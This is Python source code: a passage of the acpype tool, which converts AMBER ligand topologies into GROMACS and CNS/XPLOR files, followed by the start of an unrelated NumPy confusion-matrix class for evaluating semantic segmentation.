triclinic") text = "%11.5f %11.5f %11.5f\n" % (boxX, boxY, boxZ) elif round(vX, 2) == 109.47: self.printDebug("PBC octahedron") f1 = 0.471405 # 1/3 * sqrt(2) f2 = 0.333333 * boxX v22 = boxY * 2 * f1 v33 = boxZ * f1 * 1.73205 # f1 * sqrt(3) v21 = v31 = v32 = 0.0 v12 = f2 v13 = -f2 v23 = f1 * boxX text = "%11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f %11.5f\n" % ( boxX, v22, v33, v21, v31, v12, v32, v13, v23, ) else: self.printDebug("Box size estimated") X = [a.coords[0] * 0.1 for a in self.atoms] Y = [a.coords[1] * 0.1 for a in self.atoms] Z = [a.coords[2] * 0.1 for a in self.atoms] boxX = max(X) - min(X) # + 2.0 # 2.0 is double of rlist boxY = max(Y) - min(Y) # + 2.0 boxZ = max(Z) - min(Z) # + 2.0 text = "%11.5f %11.5f %11.5f\n" % (boxX * 20.0, boxY * 20.0, boxZ * 20.0) groFile.write(text) def writeMdpFiles(self): """Write MDP for test with GROMACS""" emMdp = """; to test ; gmx grompp -f em.mdp -c {base}_GMX.gro -p {base}_GMX.top -o em.tpr -v ; gmx mdrun -ntmpi 1 -v -deffnm em integrator = steep nsteps = 500 """.format( base=self.baseName ) mdMdp = """; to test ; gmx grompp -f md.mdp -c em.gro -p {base}_GMX.top -o md.tpr ; gmx mdrun -ntmpi 1 -v -deffnm md integrator = md nsteps = 10000 """.format( base=self.baseName ) emMdpFile = open("em.mdp", "w") mdMdpFile = open("md.mdp", 
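# Illustration (not acpype code) of the fixed-width GRO coordinate line
# written by writeGroFile above: residue number and name, atom name, atom
# number, then x/y/z in nm (prmtop coordinates are in Angstrom, hence * 0.1).
x_ang, y_ang, z_ang = 3.5428, 2.8105, 1.2216           # made-up coordinates in A
line = "%5d%5s%5s%5d%8.3f%8.3f%8.3f\n" % (
    1, "LIG", "C1", 1, x_ang * 0.1, y_ang * 0.1, z_ang * 0.1)
# -> "    1  LIG   C1    1   0.354   0.281   0.122\n"
assert len(line) == 5 + 5 + 5 + 5 + 3 * 8 + 1           # strict column widths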
"w") emMdpFile.write(emMdp) mdMdpFile.write(mdMdp) def writeCnsTopolFiles(self): """Write CNS topology files""" autoAngleFlag = True autoDihFlag = True cnsDir = os.path.abspath(".") pdb = self.baseName + "_NEW.pdb" par = self.baseName + "_CNS.par" top = self.baseName + "_CNS.top" inp = self.baseName + "_CNS.inp" pdbFileName = os.path.join(cnsDir, pdb) parFileName = os.path.join(cnsDir, par) topFileName = os.path.join(cnsDir, top) inpFileName = os.path.join(cnsDir, inp) self.CnsTopFileName = topFileName self.CnsInpFileName = inpFileName self.CnsParFileName = parFileName self.CnsPdbFileName = pdbFileName parFile = open(parFileName, "w") topFile = open(topFileName, "w") inpFile = open(inpFileName, "w") self.printMess("Writing NEW PDB file\n") self.writePdb(pdbFileName) self.printMess("Writing CNS/XPLOR files\n") # print "Writing CNS PAR file\n" parFile.write("Remarks " + head % (par, date)) parFile.write("\nset echo=false end\n") parFile.write("\n{ Bonds: atomType1 atomType2 kb r0 }\n") lineSet = [] for bond in self.bonds: a1Type = bond.atoms[0].atomType.atomTypeName + "_" a2Type = bond.atoms[1].atomType.atomTypeName + "_" kb = 1000.0 if not self.allhdg: kb = bond.kBond r0 = bond.rEq line = "BOND %5s %5s %8.1f %8.4f\n" % (a1Type, a2Type, kb, r0) lineRev = "BOND %5s %5s %8.1f %8.4f\n" % (a2Type, a1Type, kb, r0) if line not in lineSet: if lineRev not in lineSet: lineSet.append(line) for item in lineSet: parFile.write(item) parFile.write("\n{ Angles: aType1 aType2 aType3 kt t0 }\n") lineSet = [] for angle in self.angles: a1 = angle.atoms[0].atomType.atomTypeName + "_" a2 = angle.atoms[1].atomType.atomTypeName + "_" a3 = angle.atoms[2].atomType.atomTypeName + "_" kt = 500.0 if not self.allhdg: kt = angle.kTheta t0 = angle.thetaEq * radPi line = "ANGLe %5s %5s %5s %8.1f %8.2f\n" % (a1, a2, a3, kt, t0) lineRev = "ANGLe %5s %5s %5s %8.1f %8.2f\n" % (a3, a2, a1, kt, t0) if line not in lineSet: if lineRev not in lineSet: lineSet.append(line) for item in lineSet: parFile.write(item) parFile.write( "\n{ Proper Dihedrals: aType1 aType2 aType3 aType4 kt per\ iod phase }\n" ) lineSet = set() for item in self.condensedProperDihedrals: seq = "" id_ = 0 for dih in item: # id_ = item.index(dih) ll = len(item) a1 = dih.atoms[0].atomType.atomTypeName + "_" a2 = dih.atoms[1].atomType.atomTypeName + "_" a3 = dih.atoms[2].atomType.atomTypeName + "_" a4 = dih.atoms[3].atomType.atomTypeName + "_" kp = 750.0 if not self.allhdg: kp = dih.kPhi p = dih.period ph = dih.phase * radPi if ll > 1: if id_ == 0: line = ( "DIHEdral %5s %5s %5s %5s MULT %1i %7.3f %4i %8\ .2f\n" % (a1, a2, a3, a4, ll, kp, p, ph) ) else: line = "%s %7.3f %4i %8.2f\n" % (40 * " ", kp, p, ph) else: line = "DIHEdral %5s %5s %5s %5s %15.3f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) seq += line id_ += 1 lineSet.add(seq) for item in lineSet: parFile.write(item) parFile.write( "\n{ Improper Dihedrals: aType1 aType2 aType3 aType4 kt p\ eriod phase }\n" ) lineSet = set() for idh in self.improperDihedrals: a1 = idh.atoms[0].atomType.atomTypeName + "_" a2 = idh.atoms[1].atomType.atomTypeName + "_" a3 = idh.atoms[2].atomType.atomTypeName + "_" a4 = idh.atoms[3].atomType.atomTypeName + "_" kp = 750.0 if not self.allhdg: kp = idh.kPhi p = idh.period ph = idh.phase * radPi line = "IMPRoper %5s %5s %5s %5s %13.1f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) lineSet.add(line) if self.chiral: for idhc in self.chiralGroups: _atc, neig, angle = idhc a1 = neig[0].atomType.atomTypeName + "_" a2 = neig[1].atomType.atomTypeName + "_" a3 = neig[2].atomType.atomTypeName + "_" 
a4 = neig[3].atomType.atomTypeName + "_" kp = 11000.0 p = 0 ph = angle line = "IMPRoper %5s %5s %5s %5s %13.1f %4i %8.2f\n" % (a1, a2, a3, a4, kp, p, ph) lineSet.add(line) for item in lineSet: parFile.write(item) parFile.write("\n{ Nonbonded: Type Emin sigma; (1-4): Emin/2 sigma }\n") for at in self.atomTypes: A = at.ACOEF B = at.BCOEF atName = at.atomTypeName + "_" if B == 0.0: sigma = epAmber = ep2 = sig2 = 0.0 else: epAmber = 0.25 * B * B / A ep2 = epAmber / 2.0 sigma = math.pow((A / B), (1.0 / 6)) sig2 = sigma line = "NONBonded %5s %11.6f %11.6f %11.6f %11.6f\n" % (atName, epAmber, sigma, ep2, sig2) parFile.write(line) parFile.write("\nset echo=true end\n") # print "Writing CNS TOP file\n" topFile.write("Remarks " + head % (top, date)) topFile.write("\nset echo=false end\n") topFile.write("\nautogenerate angles=%s dihedrals=%s end\n" % (autoAngleFlag, autoDihFlag)) topFile.write("\n{ atomType mass }\n") for at in self.atomTypes: atType = at.atomTypeName + "_" mass = at.mass line = "MASS %-5s %8.3f\n" % (atType, mass) topFile.write(line) topFile.write("\nRESIdue %s\n" % self.residueLabel[0]) topFile.write("\nGROUP\n") topFile.write("\n{ atomName atomType Charge }\n") for at in self.atoms: atName = at.atomName atType = at.atomType.atomTypeName + "_" charge = at.charge line = "ATOM %-5s TYPE= %-5s CHARGE= %8.4f END\n" % (atName, atType, charge) topFile.write(line) topFile.write("\n{ Bonds: atomName1 atomName2 }\n") for bond in self.bonds: a1Name = bond.atoms[0].atomName a2Name = bond.atoms[1].atomName line = "BOND %-5s %-5s\n" % (a1Name, a2Name) topFile.write(line) if not autoAngleFlag or 1: # generating angles anyway topFile.write("\n{ Angles: atomName1 atomName2 atomName3}\n") for angle in self.angles: a1Name = angle.atoms[0].atomName a2Name = angle.atoms[1].atomName a3Name = angle.atoms[2].atomName line = "ANGLe %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name) topFile.write(line) if not autoDihFlag or 1: # generating angles anyway topFile.write("\n{ Proper Dihedrals: name1 name2 name3 name4 }\n") for item in self.condensedProperDihedrals: for dih in item: a1Name = dih.atoms[0].atomName a2Name = dih.atoms[1].atomName a3Name = dih.atoms[2].atomName a4Name = dih.atoms[3].atomName line = "DIHEdral %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) break topFile.write(line) topFile.write("\n{ Improper Dihedrals: aName1 aName2 aName3 aName4 }\n") for dih in self.improperDihedrals: a1Name = dih.atoms[0].atomName a2Name = dih.atoms[1].atomName a3Name = dih.atoms[2].atomName a4Name = dih.atoms[3].atomName line = "IMPRoper %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) topFile.write(line) if self.chiral: for idhc in self.chiralGroups: _atc, neig, angle = idhc a1Name = neig[0].atomName a2Name = neig[1].atomName a3Name = neig[2].atomName a4Name = neig[3].atomName line = "IMPRoper %-5s %-5s %-5s %-5s\n" % (a1Name, a2Name, a3Name, a4Name) topFile.write(line) topFile.write("\nEND {RESIdue %s}\n" % self.residueLabel[0]) topFile.write("\nset echo=true end\n") # print "Writing CNS INP file\n" inpFile.write("Remarks " + head % (inp, date)) inpData = """ topology @%(CNS_top)s end parameters @%(CNS_par)s nbonds atom cdie shift eps=1.0 e14fac=0.4 tolerance=0.5 cutnb=9.0 ctonnb=7.5 ctofnb=8.0 nbxmod=5 vswitch wmin 1.0 end remark dielectric constant eps set to 1.0 end flags exclude elec ? end segment name=" " chain coordinates @%(NEW_pdb)s end end coordinates @%(NEW_pdb)s coord copy end ! Remarks If you want to shake up the coordinates a bit ... 
vector do (x=x+6*(rand()-0.5)) (all) vector do (y=y+6*(rand()-0.5)) (all) vector do (z=z+6*(rand()-0.5)) (all) write coordinates output=%(CNS_ran)s end ! Remarks RMS diff after randomisation and before minimisation coord rms sele=(known and not hydrogen) end print threshold=0.02 bonds print threshold=3.0 angles print threshold=3.0 dihedrals print threshold=3.0 impropers ! Remarks Do Powell energy minimisation minimise powell nstep=250 drop=40.0 end write coordinates output=%(CNS_min)s end write structure output=%(CNS_psf)s end ! constraints interaction (not hydro) (not hydro) end print threshold=0.02 bonds print threshold=3.0 angles print threshold=3.0 dihedrals print threshold=3.0 impropers flags exclude * include vdw end energy end distance from=(not hydro) to=(not hydro) cutoff=2.6 end ! Remarks RMS fit after minimisation coord fit sele=(known and not hydrogen) end stop """ dictInp = {} dictInp["CNS_top"] = top dictInp["CNS_par"] = par dictInp["NEW_pdb"] = pdb dictInp["CNS_min"] = self.baseName + "_NEW_min.pdb" dictInp["CNS_psf"] = self.baseName + "_CNS.psf" dictInp["CNS_ran"] = self.baseName + "_rand.pdb" line = inpData % dictInp inpFile.write(line) if os.path.exists(self.obchiralExe): self.printDebug("chiralGroups %i" % len(self.chiralGroups)) else: self.printDebug("no 'obchiral' executable, it won't work to store non-planar improper dihedrals!") self.printDebug( "'obchiral' is deprecated in OpenBabel 3.x. Consider installing version 2.4, see http://openbabel.org" ) class ACTopol(AbstractTopol): """ Class to build the AC topologies (Antechamber AmberTools) """ def __init__( self, inputFile, chargeType="bcc", chargeVal=None, multiplicity="1", atomType="gaff", force=False, basename=None, debug=False, outTopol="all", engine="tleap", allhdg=False, timeTol=MAXTIME, qprog="sqm", ekFlag=None, verbose=True, gmx4=False, disam=False, direct=False, is_sorted=False, chiral=False, ): super().__init__() self.debug = debug self.verbose = verbose self.gmx4 = gmx4 self.disam = disam self.direct = direct self.sorted = is_sorted self.chiral = chiral self.inputFile = os.path.basename(inputFile) self.rootDir = os.path.abspath(".") self.absInputFile = os.path.abspath(inputFile) if not os.path.exists(self.absInputFile): self.printWarn("input file doesn't exist") baseOriginal, ext = os.path.splitext(self.inputFile) base = basename or baseOriginal self.baseOriginal = baseOriginal self.baseName = base # name of the input file without ext. self.timeTol = timeTol self.printDebug("Max execution time tolerance is %s" % elapsedTime(self.timeTol)) self.ext = ext if ekFlag == '"None"' or ekFlag is None: self.ekFlag = "" else: self.ekFlag = "-ek %s" % ekFlag self.extOld = ext self.homeDir = self.baseName + ".acpype" self.chargeType = chargeType self.chargeVal = chargeVal self.multiplicity = multiplicity self.atomType = atomType self.gaffDatfile = "gaff.dat" leapGaffFile = "leaprc.gaff" if "2" in self.atomType: leapGaffFile = "leaprc.gaff2" self.gaffDatfile = "gaff2.dat" self.force = force self.engine = engine self.allhdg = allhdg self.acExe = "" dirAmber = os.getenv("AMBERHOME", os.getenv("ACHOME")) if dirAmber: for ac_bin in ["bin", "exe"]: ac_path = os.path.join(dirAmber, ac_bin, "antechamber") if os.path.exists(ac_path): self.acExe = ac_path break if not self.acExe: self.acExe = which("antechamber") or "" # '/Users/alan/Programmes/antechamber-1.27/exe/antechamber' if not os.path.exists(self.acExe): self.printError("no 'antechamber' executable... aborting ! 
") hint1 = "HINT1: is 'AMBERHOME' or 'ACHOME' environment variable set?" hint2 = ( "HINT2: is 'antechamber' in your $PATH?" + "\n What 'which antechamber' in your terminal says?" + "\n 'alias' doesn't work for ACPYPE." ) self.printMess(hint1) self.printMess(hint2) sys.exit(17) self.tleapExe = which("tleap") or "" self.sleapExe = which("sleap") or "" self.parmchkExe = which("parmchk2") or "" self.babelExe = which("obabel") or which("babel") or "" if not os.path.exists(self.babelExe): if self.ext != ".mol2" and self.ext != ".mdl": # and self.ext != '.mol': self.printError("no 'babel' executable; you need it if input is PDB") self.printError("otherwise use only MOL2 or MDL file as input ... aborting!") sys.exit(15) else: self.printWarn("no 'babel' executable, no PDB file as input can be used!") acBase = base + "_AC" self.acBaseName = acBase self.acXyzFileName = acBase + ".inpcrd" self.acTopFileName = acBase + ".prmtop" self.acFrcmodFileName = acBase + ".frcmod" self.tmpDir = os.path.join(self.rootDir, ".acpype_tmp_%s" % os.path.basename(base)) self.setResNameCheckCoords() self.guessCharge() acMol2FileName = "%s_%s_%s.mol2" % (base, chargeType, atomType) self.acMol2FileName = acMol2FileName self.charmmBase = "%s_CHARMM" % base self.qFlag = qDict[qprog] self.outTopols = [outTopol] if outTopol == "all": self.outTopols = outTopols self.acParDict = { "base": base, "ext": ext[1:], "acBase": acBase, "acMol2FileName": acMol2FileName, "res": self.resName, "leapAmberFile": leapAmberFile, "baseOrg": self.baseOriginal, "leapGaffFile": leapGaffFile, } class MolTopol(AbstractTopol): """" Class to write topologies and parameters files for several applications http://amber.scripps.edu/formats.html (not updated to amber 10 yet) Parser, take information in AC xyz and top files and convert to objects INPUTS: acFileXyz and acFileTop RETURN: molTopol obj or None """ def __init__( self, acTopolObj=None, acFileXyz=None, acFileTop=None, debug=False, basename=None, verbose=True, gmx4=False, disam=False, direct=False, is_sorted=False, chiral=False, ): super().__init__() self.chiral = chiral self.obchiralExe = which("obchiral") or "" self.allhdg = False self.debug = debug self.gmx4 = gmx4 self.disam = disam self.direct = direct self.sorted = is_sorted self.verbose = verbose self.inputFile = acFileTop if acTopolObj: if not acFileXyz: acFileXyz = acTopolObj.acXyzFileName if not acFileTop: acFileTop = acTopolObj.acTopFileName self._parent = acTopolObj self.allhdg = self._parent.allhdg self.debug = self._parent.debug self.inputFile = self._parent.inputFile if not os.path.exists(acFileXyz) and not os.path.exists(acFileTop): self.printError("Files '%s' and/or '%s' don't exist" % (acFileXyz, acFileTop)) self.printError("molTopol object won't be created") self.xyzFileData = open(acFileXyz, "r").readlines() self.topFileData = [x for x in open(acFileTop, "r").readlines() if not x.startswith("%COMMENT")] self.topo14Data = Topology_14() self.topo14Data.read_amber_topology("".join(self.topFileData)) self.printDebug("prmtop and inpcrd files loaded") # self.pointers = self.getFlagData('POINTERS') self.getResidueLabel() if len(self.residueLabel) > 1: self.baseName = basename or os.path.splitext(os.path.basename(acFileTop))[0] # 'solute' else: self.baseName = basename or self.residueLabel[0] # 3 caps letters if acTopolObj: self.baseName = basename or acTopolObj.baseName self.printDebug("basename defined = '%s'" % self.baseName) self.getAtoms() self.getBonds() self.getAngles() self.getDihedrals() self.getChirals() if not 
os.path.exists(self.obchiralExe) and self.chiral: self.printWarn("No 'obchiral' executable, it won't work to store non-planar improper dihedrals!") self.printWarn( "'obchiral' is deprecated in OpenBabel 3.x. Consider installing version 2.4, see http://openbabel.org" ) elif self.chiral and not self.chiralGroups: self.printWarn("No chiral atoms found") # self.setAtomPairs() # self.getExcludedAtoms() # a list of FLAGS from acTopFile that matter # self.flags = ( 'POINTERS', 'ATOM_NAME', 'CHARGE', 'MASS', 'ATOM_TYPE_INDEX', # 'NUMBER_EXCLUDED_ATOMS', 'NONBONDED_PARM_INDEX', # 'RESIDUE_LABEL', 'BOND_FORCE_CONSTANT', 'BOND_EQUIL_VALUE', # 'ANGLE_FORCE_CONSTANT', 'ANGLE_EQUIL_VALUE', # 'DIHEDRAL_FORCE_CONSTANT', 'DIHEDRAL_PERIODICITY', # 'DIHEDRAL_PHASE', 'AMBER_ATOM_TYPE' ) # Sort atoms for gromacs output. # JDC if self.sorted: self.printMess("Sorting atoms for gromacs ordering.\n") self.sortAtomsForGromacs() def search(self, name=None, alist=False): """ returns a list with all atomName matching 'name' or just the first case """ ll = [x for x in self.atoms if x.atomName == name.upper()] if ll and not alist: ll = ll[0] return ll class Atom: """ Charges in prmtop file has to be divide by 18.2223 to convert to charge in units of the electron charge. To convert ACOEF and BCOEF to r0 (Ang.) and epsilon (kcal/mol), as seen in gaff.dat for example; same atom type (i = j): r0 = 1/2 * (2 * ACOEF/BCOEF)^(1/6) epsilon = 1/(4 * A) * BCOEF^2 To convert r0 and epsilon to ACOEF and BCOEF ACOEF = sqrt(ep_i * ep_j) * (r0_i + r0_j)^12 BCOEF = 2 * sqrt(ep_i * ep_j) * (r0_i + r0_j)^6 = 2 * ACOEF/(r0_i + r0_j)^6 where index i and j for atom types. Coord is given in Ang. and mass in Atomic Mass Unit. """ def __init__(self, atomName, atomType, id_, resid, mass, charge, coord): self.atomName = atomName self.atomType = atomType self.id = id_ self.cgnr = id_ self.resid = resid self.mass = mass self.charge = charge # / qConv self.coords = coord def __str__(self): return "<Atom id=%s, name=%s, %s>" % (self.id, self.atomName, self.atomType) def __repr__(self): return "<Atom id=%s, name=%s, %s>" % (self.id, self.atomName, self.atomType) class AtomType: """ AtomType per atom in gaff or amber. """ def __init__(self, atomTypeName, mass, ACOEF, BCOEF): self.atomTypeName = atomTypeName self.mass = mass self.ACOEF = ACOEF self.BCOEF = BCOEF def __str__(self): return "<AtomType=%s>" % self.atomTypeName def __repr__(self): return "<AtomType=%s>" % self.atomTypeName class Bond: """ attributes: pair of Atoms, spring constant (kcal/mol), dist. eq. (Ang) """ def __init__(self, atoms, kBond, rEq): self.atoms = atoms self.kBond = kBond self.rEq = rEq def __str__(self): return "<%s, r=%s>" % (self.atoms, self.rEq) def __repr__(self): return "<%s, r=%s>" % (self.atoms, self.rEq) class Angle: """ attributes: 3 Atoms, spring constant (kcal/mol/rad^2), angle eq. 
(rad) """ def __init__(self, atoms, kTheta, thetaEq): self.atoms = atoms self.kTheta = kTheta self.thetaEq = thetaEq # rad, to convert to degree: thetaEq * 180/Pi def __str__(self): return "<%s, ang=%.2f>" % (self.atoms, self.thetaEq * 180 / Pi) def __repr__(self): return "<%s, ang=%.2f>" % (self.atoms, self.thetaEq * 180 / Pi) class Dihedral: """ attributes: 4 Atoms, spring constant (kcal/mol), periodicity, phase (rad) """ def __init__(self, atoms, kPhi, period, phase): self.atoms = atoms self.kPhi = kPhi self.period = period self.phase = phase # rad, to convert to degree: kPhi * 180/Pi def __str__(self): return "<%s, ang=%.2f>" % (self.atoms, self.phase * 180 / Pi) def __repr__(self): return "<%s, ang=%.2f>" % (self.atoms, self.phase * 180 / Pi) def init_main(): """ Main funcition, to satisfy Conda """ parser = argparse.ArgumentParser(usage=usage + epilog) parser.add_argument( "-i", "--input", action="store", dest="input", help="input file name with either extension '.pdb', '.mdl' or '.mol2' (mandatory if -p and -x not set)", ) parser.add_argument( "-b", "--basename", action="store", dest="basename", help="a basename for the project (folder and output files)", ) parser.add_argument( "-x", "--inpcrd", action="store", dest="inpcrd", help="amber inpcrd file name (always used with -p)", ) parser.add_argument( "-p", "--prmtop", action="store", dest="prmtop", help="amber prmtop file name (always used with -x)", ) parser.add_argument( "-c", "--charge_method", choices=["gas", "bcc", "user"], action="store", default="bcc", dest="charge_method", help="charge method: gas, bcc (default), user (user's charges in mol2 file)", ) parser.add_argument( "-n", "--net_charge", action="store", type=int, default=None, dest="net_charge", help="net molecular charge (int), for gas default is 0", ) parser.add_argument( "-m", "--multiplicity", action="store", type=int, default=1, dest="multiplicity", help="multiplicity (2S+1), default is 1", ) parser.add_argument( "-a", "--atom_type", choices=["gaff", "amber", "gaff2", "amber2"], action="store", default="gaff", dest="atom_type", help="atom type, can be gaff, gaff2, amber (AMBER14SB) or amber2 (AMBER14SB + GAFF2), default is gaff", ) parser.add_argument( "-q", "--qprog", choices=["mopac", "sqm", "divcon"], action="store", default="sqm", dest="qprog", help="am1-bcc flag, sqm (default), divcon, mopac", ) parser.add_argument( "-k", "--keyword", action="store", dest="keyword", help="mopac or sqm keyword, inside quotes", ) parser.add_argument( "-f", "--force", action="store_true", dest="force", help="force topologies recalculation anew", ) parser.add_argument( "-d", "--debug", action="store_true", dest="debug", help="for debugging purposes, keep any temporary file created", ) parser.add_argument( "-o", "--outtop", choices=["all"] + outTopols, action="store", default="all", dest="outtop", help="output topologies: all (default), gmx, cns or charmm", ) parser.add_argument( "-z", "--gmx4", action="store_true", dest="gmx4", help="write RB dihedrals old GMX 4.0", ) parser.add_argument( "-t", "--cnstop", action="store_true", dest="cnstop", help="write CNS topology with allhdg-like parameters (experimental)", ) parser.add_argument( "-e", "--engine", choices=["tleap", "sleap"], action="store", default="tleap", dest="engine", help="engine: tleap (default) or sleap (not fully matured)", ) parser.add_argument( "-s", "--max_time", type=int, action="store", default=MAXTIME, dest="max_time", help="max time (in sec) tolerance for sqm/mopac, default is %i hours" % (MAXTIME // 3600), ) 
parser.add_argument( "-y", "--ipython", action="store_true", dest="ipython", help="start iPython interpreter", ) parser.add_argument( "-w", "--verboseless", action="store_false", default=True, dest="verboseless", help="print nothing", ) parser.add_argument( "-g", "--disambiguate", action="store_true", dest="disambiguate", help="disambiguate lower and uppercase atomtypes in GMX top file", ) parser.add_argument( "-u", "--direct", action="store_true", dest="direct", help="for 'amb2gmx' mode, does a direct conversion, for any solvent", ) parser.add_argument( "-l", "--sorted", action="store_true", dest="sorted", help="sort atoms for GMX ordering", ) parser.add_argument( "-j", "--chiral", action="store_true", dest="chiral", help="create improper dihedral parameters for chiral atoms in CNS", ) args = parser.parse_args() at0 = time.time() print(header) amb2gmxF = False # if args.chiral: # args.cnstop = True if not args.input: amb2gmxF = True if not args.inpcrd or not args.prmtop: parser.error("missing input files") elif args.inpcrd or args.prmtop: parser.error("either '-i' or ('-p', '-x'), but not both") if args.debug: texta = "Python Version %s" % sys.version print("DEBUG: %s" % while_replace(texta)) if args.direct and not amb2gmxF: parser.error("option -u is only meaningful in 'amb2gmx' mode") try: if amb2gmxF: print("Converting Amber input files to Gromacs ...") system = MolTopol( acFileXyz=args.inpcrd, acFileTop=args.prmtop, debug=args.debug, basename=args.basename, verbose=args.verboseless, gmx4=args.gmx4, disam=args.disambiguate, direct=args.direct, is_sorted=args.sorted, chiral=args.chiral, ) system.printDebug("prmtop and inpcrd files parsed") system.writeGromacsTopolFiles(amb2gmx=True) else: molecule = ACTopol( args.input, chargeType=args.charge_method, chargeVal=args.net_charge, debug=args.debug, multiplicity=args.multiplicity, atomType=args.atom_type, force=args.force, outTopol=args.outtop, engine=args.engine, allhdg=args.cnstop, basename=args.basename, timeTol=args.max_time, qprog=args.qprog, ekFlag='''"%s"''' % args.keyword, verbose=args.verboseless, gmx4=args.gmx4, disam=args.disambiguate, direct=args.direct, is_sorted=args.sorted, chiral=args.chiral, ) molecule.createACTopol() molecule.createMolTopol() acpypeFailed = False except Exception: _exceptionType, exceptionValue, exceptionTraceback = sys.exc_info() print("ACPYPE FAILED: %s" % exceptionValue) if args.debug: traceback.print_tb(exceptionTraceback, file=sys.stdout) acpypeFailed = True execTime = int(round(time.time() - at0)) if execTime == 0: amsg = "less than a second" else: amsg = elapsedTime(execTime) print("Total time of execution: %s" % amsg) if args.ipython: import IPython # pylint: disable=import-outside-toplevel IPython.embed() try: rmtree(molecule.tmpDir) except Exception: pass if acpypeFailed: sys.exit(19) try: os.chdir(molecule.rootDir) except Exception: pass if __name__ == "__main__": # For pip package # LOCAL_PATH = os.getcwd() # os.environ["PATH"] += ( # os.pathsep # + LOCAL_PATH # + "amber19-0_linux/bin/to_be_dispatched:" # + LOCAL_PATH # + "/amber19-0_linux/bin:" # + LOCAL_PATH # + "/amber19-0_linux/dat/" # ) # os.environ["AMBERHOME"] = LOCAL_PATH +'/amber19-0_linux' # os.environ["ACHOME"] = LOCAL_PATH +'/amber19-0_linux/bin/' # os.environ["LD_LIBRARY_PATH"] =LOCAL_PATH +'/amber19-0_linux/lib' init_main() # necessary for to call in anaconda package;
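# Hedged usage sketch (illustration only; never called, file names are
# hypothetical): programmatic equivalent of the amb2gmx branch of init_main()
# above, converting an existing AMBER prmtop/inpcrd pair to GROMACS.
def _example_amb2gmx(prmtop="ligand.prmtop", inpcrd="ligand.inpcrd"):
    system = MolTopol(acFileXyz=inpcrd, acFileTop=prmtop, basename="ligand")
    system.writeGromacsTopolFiles(amb2gmx=True)   # writes ligand_GMX.top / .gro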
import numpy as np import matplotlib.pyplot as plt import matplotlib as mpl class Confusion(object): '''Confusion matrix class including incremental confusion computation. Instances of this class can be used to compute the confusion matrix and other typical scores for semantic segmentation problems. Either incrementally or in one call. All labels should be positive integers. With the exception of a negative void label. Methods for plotting and printing are included. ''' def __init__(self, label_names, void_label=-1, label_count=None): '''Inits a Confusion matrix with label names and the void label. Parameters ---------- label_names : list of strings or None A list of all label names. The void label name should not be included void_label : int (default: -1) This label will be ignored. It has to be negative. label_count : int or None (default: None) If label_names is None, this will be used to define the shape of the confusion matrix. Raises ------ ValueError When both `label_names` and `label_count` is ``None``, or if `void_label` is positive, a `ValueError` is raised. ''' if label_names is not None: self.label_names = (np.array(label_names).copy()).tolist() else: if label_count is None: raise ValueError('Either label_names or label_count has to be ' 'specified.') else: self.label_names = [str(i) for i in range(label_count)] if void_label >= 0: raise ValueError('The void label needs to be a negative number.') else: self.void_label = void_label self.class_count= len(self.label_names) self.reset() def reset(self): '''Reset all values to allow for a fresh computation. ''' self.confusion = np.zeros((self.class_count,self.class_count), np.int64) self.confusion_normalized_row = None self.confusion_normalized_col = None self.global_score = 0 self.avg_score = 0 self.avg_iou_score = 0 self.finished_computation = False def finish(self): '''Computes all scores given the accumulated data. ''' total = np.sum(self.confusion) self.gt_sum_per_class = np.sum(self.confusion, 1) self.sum_per_class = np.sum(self.confusion, 0) self.global_score = np.sum(np.diag(self.confusion))/total diag = np.diag(self.confusion) union = self.gt_sum_per_class + self.sum_per_class - diag self.avg_score = np.nanmean(diag/self.gt_sum_per_class) self.avg_iou_score = np.nanmean(diag/union) self.confusion_normalized_row = ( self.confusion.copy().T/self.gt_sum_per_class.astype(np.float32)).T self.confusion_normalized_col = ( self.confusion.copy()/self.sum_per_class.astype(np.float32)) self.finished_computation = True def incremental_update(self, gt, pred, allow_void_prediction=False, update_finished=True): '''Update the confusion matrix with the provided data. Given the ground truth and predictions the stored confusion matrix is updated. If all scores have been computed before they become invalid after this operation and need to be recomputed. Updates can be done with a single image, a batch, or the complete dataset at once. gt : np.ndarray The ground truth image(s). Either a single image (WxH) or a tensor of several images (BxWxH). pred : np.ndarray The prediction image(s). Either a single image (WxH) or a tensor of several images (BxWxH). Needs the same shape as gt. allow_void_prediction : bool (default: False) Specifies if void predictions are allowed or not. Typically this is not desired and an exception is raised when predictions have void labels. When set to True, these labels are ignored during the computation. 
        update_finished : bool (default: True)
            When set to False this method raises an exception if scores have
            been computed before. If left at True, nothing happens.

        Raises
        ------
        ValueError
            When `gt` and `pred` don't have matching shapes, when the labels
            are too large, or when `pred` contains void labels and
            `allow_void_prediction` is set to False a `ValueError` is raised.

        Exception
            When `update_finished` is set to False and this method is called
            after the scores have been computed an `Exception` is raised.

        '''
        if gt.shape != pred.shape:
            raise ValueError('Ground truth and prediction shape mismatch.')

        if not allow_void_prediction and self.void_label in pred:
            raise ValueError('Void labels found in the predictions. Fix the '
                             'predictions, or set `allow_void_prediction` to '
                             'True.')

        if np.max(gt) >= self.class_count:
            raise ValueError('Labels in the ground truth exceed the class count.')

        if np.max(pred) >= self.class_count:
            raise ValueError('Labels in the prediction exceed the class count.')

        if self.finished_computation and not update_finished:
            raise Exception('You specified not to allow updates after computing'
                            ' scores.')

        gt_flat = gt.flatten().astype(np.int32)
        pred_flat = pred.flatten().astype(np.int32)

        # Drop void pixels from the ground truth (and, if allowed, from the
        # predictions) before accumulating counts.
        non_void = gt_flat != self.void_label
        if allow_void_prediction:
            non_void *= pred_flat != self.void_label

        gt_flat = gt_flat[non_void]
        pred_flat = pred_flat[non_void]

        # Encode (gt, pred) pairs as flat indices into the confusion matrix and
        # add their counts.
        pairs = gt_flat*self.class_count + pred_flat
        pairs, pair_counts = np.unique(pairs, return_counts=True)
        self.confusion.flat[pairs] += pair_counts

        self.finished_computation = False

    def plot(self, colormap=None, number_format=None, only_return_fig=False):
        '''Create and plot a figure summarizing all information.

        Parameters
        ----------
        colormap : mpl.cm (default: None)
            The colormap used to colorize the matrices. None results in the mpl
            default being used.
        number_format : string or None (default: None)
            The format used to print percentages into the confusion matrix.
            When not provided the numbers are not printed. For example
            `{0:>7.2%}`.
        only_return_fig : bool (default: False)
            When set to True the figure is only returned, for example for
